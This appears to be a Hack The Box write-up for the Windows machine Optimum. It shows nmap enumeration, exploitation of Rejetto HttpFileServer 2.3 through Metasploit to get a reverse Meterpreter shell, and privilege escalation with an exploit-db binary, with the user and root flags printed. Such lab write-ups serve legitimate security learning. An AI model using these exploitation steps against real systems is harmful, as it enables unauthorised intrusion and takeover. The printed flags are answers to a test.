HTB Optimum - Windows (Easy)
Optimum is a beginner-level machine which mainly focuses on enumeration of services with known exploits via Searchsploit and Msfconsole.
Optimum is a beginner-level machine which mainly focuses on enumeration of services with known exploits. Both exploits are easy to obtain and have associated Metasploit modules, making this machine fairly simple to complete.
Network Enumeration
┌──(kali㉿kali)-[~]
└─$ cat scan.log
# Nmap 7.95 scan initiated 2025 as: /usr/lib/nmap/nmap -Pn -sV -oN scan.log 10.10.10.8
Nmap scan report for optimum.htb (10.10.10.8)
Host is up (0.022s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at 2025 -- 1 IP address (1 host up) scanned in secondsWelp, we know the port 80/tcp have a very old version so we can search up searchsploit to see if we can gain RCE from it, maybe since theres no other end-points that we could find?
Remote Code Execution
┌──(root㉿kali)-[/]
└─# searchsploit HttpFileServer
---------------------------------------------------
Exploit Title | Path
---------------------------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py
---------------------------------------------------
Shellcodes: No ResultsBoom! we get our guns, now we can just use that, Perfectly the same as the one we saw on our nmap scan
Rejetto HttpFileServer 2.3.xExploitation
┌──(root㉿kali)-[/]
└─# searchsploit HttpFileServer
-----------------------------------------
Exploit Title | Path
-----------------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py
------------------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[/]
└─# msfconsole -q
msf6 > search HttpFileServer
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sock
s5, socks5h, sapni, http, socks4
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
g-metasploit.html
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the loca
l machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.10.10.8
RHOSTS => 10.10.10.8
msf6 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.x.x
LHOST => 10.10.x.x
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.24:4444
[*] Using URL: http://10.10.x.x:8080/eh7zDBdXOthr
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /eh7zDBdXOthr
[*] Sending stage (177734 bytes) to 10.10.10.8
[!] Tried to delete %TEMP%\rxtXrNsrAA.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.x.x:4444 -> 10.10.10.8:49162) at 2025-07-14 16:29:14 +0000
[*] Server stopped.
meterpreter > ls
Listing: C:\Users\kostas\Desktop
================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2025-07-21 01:04:06 +0000 %TEMP%
100666/rw-rw-rw- 282 fil 2017-03-18 11:57:16 +0000 desktop.ini
100777/rwxrwxrwx 760320 fil 2017-03-18 12:11:17 +0000 hfs.exe
100444/r--r--r-- 34 fil 2025-07-21 00:46:17 +0000 user.txt
meterpreter > getuid
Server username: OPTIMUM\kostas
meterpreter > Welp look at that, we got the user flag just by nmap, Searchsploit, and Metasploit. Once we get our Meterpreter shell, we can use the “shell” command to drop into a normal shell, or if you’re like me who doest care about interfaces, just do what you do Linux machine, maybe “ls“. We should have a shell as “optimum\kostas”.
Sysinfo & Target Vuln Recon
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows Server 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > Wow, still I need to continue with this? bahahhaha
Windows Server 2012Nice Info, seems everything can be done in 1 minute, at this point you can Privilege escalation by using kernel attack on MS16-032 still via msfconsole.
msf6 exploit(windows/http/rejetto_hfs_exec) > search ms16-032
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation
1 \_ target: Windows x86 . . . .
2 \_ target: Windows x64Or you can setup your own manual exploit with powershell, manually upload and execute a PowerShell exploit script, e.g., Invoke-MS16-032. To be honest, WinPeas or any Tools .exe would be the same as easy as using a module from Mesaploit it-self, so we can just create a session 2.
Gain Administrator Access
meterpreter > cat user.txt
c0bd1d707e179cfd5553987f9bf06d99
meterpreter > upload winPEASx64.exe
[*] Uploading : /winPEASx64.exe
[*] Uploaded 8.00 MiB of 9.69 MiB (82.6%): /winPEASx64.exe -> winPEASx64.exe
[*] Uploaded 9.69 MiB of 9.69 MiB (100.0%): /winPEASx64.exe -> winPEASx64.exe
[*] Completed : /winPEASx64.exe -> winPEASx64.exe
meterpreter > ls
Listing: C:\Users\kostas\Desktop
================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2025-07-21 01:36:30 +0000 %TEMP%
100666/rw-rw-rw- 282 fil 2017-03-18 11:57:16 +0000 desktop.ini
100777/rwxrwxrwx 760320 fil 2017-03-18 12:11:17 +0000 hfs.exe
100444/r--r--r-- 34 fil 2025-0x-x1 00:46:17 +0000 user.txt
100777/rwxrwxrwx 10156032 fil 2025-0x-x1 01:38:21 +0000 winPEASx64.exe
meterpreter > .\winPEASx64.exe
[-] Unknown command: .winPEASx64.exe. Run the help command for more details.
meterpreter > shell
Process 2716 created.
Channel 4 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is EE82-226D
Directory of C:\Users\kostas\Desktop
x1/0x/2025 04:38 �� <DIR> .
x1/0x/2025 04:38 �� <DIR> ..
x1/0x/2025 04:36 �� <DIR> %TEMP%
18/03/2017 03:11 �� 760.320 hfs.exe
xx/0x/2025 03:46 �� 34 user.txt
x1/0x/2025 04:38 �� 10.156.032 winPEASx64.exe
3 File(s) 10.916.386 bytes
3 Dir(s) 5.677.174.784 bytes free
C:\Users\kostas\Desktop>.\winPEASx64.exe
.\winPEASx64.exe
[!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMDFinal foot hold, and now we know what would be our next custom .exe file for moving forward to admin (you can see it in www.exploit-db.com).
meterpreter > dir
Listing: C:\Users\kostas\Desktop
================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 202x-07-x1 01:52:32 +0000 %TEMP%
100777/rwxrwxrwx 560128 fil 202x-07-x1 01:45:01 +0000 41020.exe
100666/rw-rw-rw- 282 fil 2017-03-18 11:57:16 +0000 desktop.ini
100777/rwxrwxrwx 760320 fil 2017-03-18 12:11:17 +0000 hfs.exe
100444/r--r--r-- 34 fil 2025-0x-x1 00:46:17 +0000 user.txt
100777/rwxrwxrwx 10156032 fil 2025-0x-x1 01:38:21 +0000 winPEASx64.exe
meterpreter > shell
Process 1628 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
d2a1d3996608bb3280690d527db94fcd
C:\Users\Administrator\Desktop>type C:\Users\kostas\Desktop>user.txt
type C:\Users\kostas\Desktop>user.txt
Access is denied.
C:\Users\Administrator\Desktop>cd ../..
cd ../..
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is EE82-226D
Directory of C:\Users
18/03/2017 02:57 �� <DIR> .
18/03/2017 02:57 �� <DIR> ..
18/03/2017 02:52 �� <DIR> Administrator
xx/0x/2025 04:48 �� <DIR> kostas
22/08/2013 06:39 �� <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 1.742.913.536 bytes free
C:\Users>cd kostas
cd kostas
C:\Users\kostas>cd Desktop
cd Desktop
C:\Users\kostas\Desktop>type user.txt
type user.txt
c0bd1d707e179cfd5553987f9bf06d99
C:\Users\kostas\Desktop>A great box for a starters, no Kerberos, no NTLM, no SQL or NoSQL, just a ready exploit for run and slam, thanks HackTheBox.
The Optimum machine reinforced the importance of thorough enumeration and research when approaching a penetration test. By systematically scanning for open services and identifying vulnerabilities, I was able to exploit the Rejetto HTTP File Server using Metasploit to gain an initial foothold.
From there, leveraging CVE helped uncover an un-patched Windows version vulnerable to MS16–098, which ultimately led to privilege escalation and full system control as NT AUTHORITY\SYSTEM. This box demonstrated how critical it is to recognize outdated software and leverage the right exploits efficiently to achieve a successful compromise.
Happy hacking!